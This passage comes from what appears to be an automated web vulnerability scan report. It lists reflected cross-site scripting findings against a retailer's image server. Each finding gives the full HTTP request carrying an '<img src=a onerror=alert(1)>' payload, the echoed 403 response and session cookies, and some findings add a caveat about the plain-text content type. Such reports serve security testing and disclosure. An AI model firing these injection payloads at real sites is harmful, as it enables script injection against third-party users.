Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:13 GMT
Connection: close

Unable to find /pacsunproducts/8805558_0161996<img src=a onerror=alert(1)>a6903d9492e

3.222. http://images3.pacsun.com/is/image/pacsunproducts/8831141_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8831141_01

Issue detail

The value of REST URL parameter 4 is echoed, without encoding, into the body of the error response. The payload ebcbd<img%20src%3da%20onerror%3dalert(1)>66693aacae0 was submitted in REST URL parameter 4 and was echoed back as ebcbd<img src=a onerror=alert(1)>66693aacae0 in the application's response.

This proof of concept shows that markup supplied in the URL path reaches the response unmodified; the injected element carries an event handler that would execute arbitrary JavaScript if the body were parsed as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and no X-Content-Type-Options header: a browser that honours the declared type renders the body as text and the handler never fires, so script execution here depends on a client sniffing the body as HTML. Treat the finding as an unencoded reflection in an error handler and confirm a rendering context before rating it as exploitable.

Request

GET /is/image/pacsunproducts/8831141_01ebcbd<img%20src%3da%20onerror%3dalert(1)>66693aacae0?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:24 GMT
Connection: close

Unable to find /pacsunproducts/8831141_01ebcbd<img src=a onerror=alert(1)>66693aacae0

3.223. http://images3.pacsun.com/is/image/pacsunproducts/8842700_01_003 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8842700_01_003

Issue detail

The value of REST URL parameter 4 is echoed, without encoding, into the body of the error response. The payload e7088<img%20src%3da%20onerror%3dalert(1)>9d68a8ca440 was submitted in REST URL parameter 4 and was echoed back as e7088<img src=a onerror=alert(1)>9d68a8ca440 in the application's response.

This proof of concept shows that markup supplied in the URL path reaches the response unmodified; the injected element carries an event handler that would execute arbitrary JavaScript if the body were parsed as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and no X-Content-Type-Options header: a browser that honours the declared type renders the body as text and the handler never fires, so script execution here depends on a client sniffing the body as HTML. Treat the finding as an unencoded reflection in an error handler and confirm a rendering context before rating it as exploitable.

Request

GET /is/image/pacsunproducts/8842700_01_003e7088<img%20src%3da%20onerror%3dalert(1)>9d68a8ca440?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:06 GMT
Connection: close

Unable to find /pacsunproducts/8842700_01_003e7088<img src=a onerror=alert(1)>9d68a8ca440

3.224. http://images3.pacsun.com/is/image/pacsunproducts/8842700_sw_003 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8842700_sw_003

Issue detail

The value of REST URL parameter 4 is echoed, without encoding, into the body of the error response. The payload b792c<img%20src%3da%20onerror%3dalert(1)>c708b5b3f36 was submitted in REST URL parameter 4 and was echoed back as b792c<img src=a onerror=alert(1)>c708b5b3f36 in the application's response.

This proof of concept shows that markup supplied in the URL path reaches the response unmodified; the injected element carries an event handler that would execute arbitrary JavaScript if the body were parsed as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and no X-Content-Type-Options header: a browser that honours the declared type renders the body as text and the handler never fires, so script execution here depends on a client sniffing the body as HTML. Treat the finding as an unencoded reflection in an error handler and confirm a rendering context before rating it as exploitable.

Request

GET /is/image/pacsunproducts/8842700_sw_003b792c<img%20src%3da%20onerror%3dalert(1)>c708b5b3f36?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:06 GMT
Connection: close

Unable to find /pacsunproducts/8842700_sw_003b792c<img src=a onerror=alert(1)>c708b5b3f36

3.225. http://images3.pacsun.com/is/image/pacsunproducts/8842700_sw_242 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8842700_sw_242

Issue detail

The value of REST URL parameter 4 is echoed, without encoding, into the body of the error response. The payload 30611<img%20src%3da%20onerror%3dalert(1)>09d6acce984 was submitted in REST URL parameter 4 and was echoed back as 30611<img src=a onerror=alert(1)>09d6acce984 in the application's response.

This proof of concept shows that markup supplied in the URL path reaches the response unmodified; the injected element carries an event handler that would execute arbitrary JavaScript if the body were parsed as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and no X-Content-Type-Options header: a browser that honours the declared type renders the body as text and the handler never fires, so script execution here depends on a client sniffing the body as HTML. Treat the finding as an unencoded reflection in an error handler and confirm a rendering context before rating it as exploitable.

Request

GET /is/image/pacsunproducts/8842700_sw_24230611<img%20src%3da%20onerror%3dalert(1)>09d6acce984?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:06 GMT
Connection: close

Unable to find /pacsunproducts/8842700_sw_24230611<img src=a onerror=alert(1)>09d6acce984

3.226. http://images3.pacsun.com/is/image/pacsunproducts/8844706_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8844706_01

Issue detail

The value of REST URL parameter 4 is echoed, without encoding, into the body of the error response. The payload 6107d<img%20src%3da%20onerror%3dalert(1)>e624fee1427 was submitted in REST URL parameter 4 and was echoed back as 6107d<img src=a onerror=alert(1)>e624fee1427 in the application's response.

This proof of concept shows that markup supplied in the URL path reaches the response unmodified; the injected element carries an event handler that would execute arbitrary JavaScript if the body were parsed as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and no X-Content-Type-Options header: a browser that honours the declared type renders the body as text and the handler never fires, so script execution here depends on a client sniffing the body as HTML. Treat the finding as an unencoded reflection in an error handler and confirm a rendering context before rating it as exploitable.

Request

GET /is/image/pacsunproducts/8844706_016107d<img%20src%3da%20onerror%3dalert(1)>e624fee1427?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:16 GMT
Connection: close

Unable to find /pacsunproducts/8844706_016107d<img src=a onerror=alert(1)>e624fee1427

3.227. http://images3.pacsun.com/is/image/pacsunproducts/8861239_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8861239_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3f5bb<img%20src%3da%20onerror%3dalert(1)>a491f4508bc was submitted in the REST URL parameter 4. This input was echoed as 3f5bb<img src=a onerror=alert(1)>a491f4508bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8861239_013f5bb<img%20src%3da%20onerror%3dalert(1)>a491f4508bc?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:55 GMT
Connection: close

Unable to find /pacsunproducts/8861239_013f5bb<img src=a onerror=alert(1)>a491f4508bc

3.228. http://images3.pacsun.com/is/image/pacsunproducts/8863946_01_804 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8863946_01_804

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7a1c3<img%20src%3da%20onerror%3dalert(1)>6af960c4dea was submitted in the REST URL parameter 4. This input was echoed as 7a1c3<img src=a onerror=alert(1)>6af960c4dea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8863946_01_8047a1c3<img%20src%3da%20onerror%3dalert(1)>6af960c4dea?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:25 GMT
Connection: close

Unable to find /pacsunproducts/8863946_01_8047a1c3<img src=a onerror=alert(1)>6af960c4dea

3.229. http://images3.pacsun.com/is/image/pacsunproducts/8863946_sw_001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8863946_sw_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a75b5<img%20src%3da%20onerror%3dalert(1)>0581d48490f was submitted in the REST URL parameter 4. This input was echoed as a75b5<img src=a onerror=alert(1)>0581d48490f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8863946_sw_001a75b5<img%20src%3da%20onerror%3dalert(1)>0581d48490f?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:22 GMT
Connection: close

Unable to find /pacsunproducts/8863946_sw_001a75b5<img src=a onerror=alert(1)>0581d48490f

3.230. http://images3.pacsun.com/is/image/pacsunproducts/8863946_sw_011 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8863946_sw_011

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 48a06<img%20src%3da%20onerror%3dalert(1)>08df469c4e0 was submitted in the REST URL parameter 4. This input was echoed as 48a06<img src=a onerror=alert(1)>08df469c4e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8863946_sw_01148a06<img%20src%3da%20onerror%3dalert(1)>08df469c4e0?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:23 GMT
Connection: close

Unable to find /pacsunproducts/8863946_sw_01148a06<img src=a onerror=alert(1)>08df469c4e0

3.231. http://images3.pacsun.com/is/image/pacsunproducts/8863946_sw_804 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8863946_sw_804

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3c7e2<img%20src%3da%20onerror%3dalert(1)>7e69ac8974 was submitted in the REST URL parameter 4. This input was echoed as 3c7e2<img src=a onerror=alert(1)>7e69ac8974 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8863946_sw_8043c7e2<img%20src%3da%20onerror%3dalert(1)>7e69ac8974?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 88
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:24 GMT
Connection: close

Unable to find /pacsunproducts/8863946_sw_8043c7e2<img src=a onerror=alert(1)>7e69ac8974

3.232. http://images3.pacsun.com/is/image/pacsunproducts/8868382_01_066 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8868382_01_066

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload aa815<img%20src%3da%20onerror%3dalert(1)>53559da58d7 was submitted in the REST URL parameter 4. This input was echoed as aa815<img src=a onerror=alert(1)>53559da58d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8868382_01_066aa815<img%20src%3da%20onerror%3dalert(1)>53559da58d7?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:24 GMT
Connection: close

Unable to find /pacsunproducts/8868382_01_066aa815<img src=a onerror=alert(1)>53559da58d7

3.233. http://images3.pacsun.com/is/image/pacsunproducts/8868382_sw_054 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8868382_sw_054

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e7502<img%20src%3da%20onerror%3dalert(1)>07e6cff3556 was submitted in the REST URL parameter 4. This input was echoed as e7502<img src=a onerror=alert(1)>07e6cff3556 in the application's response.

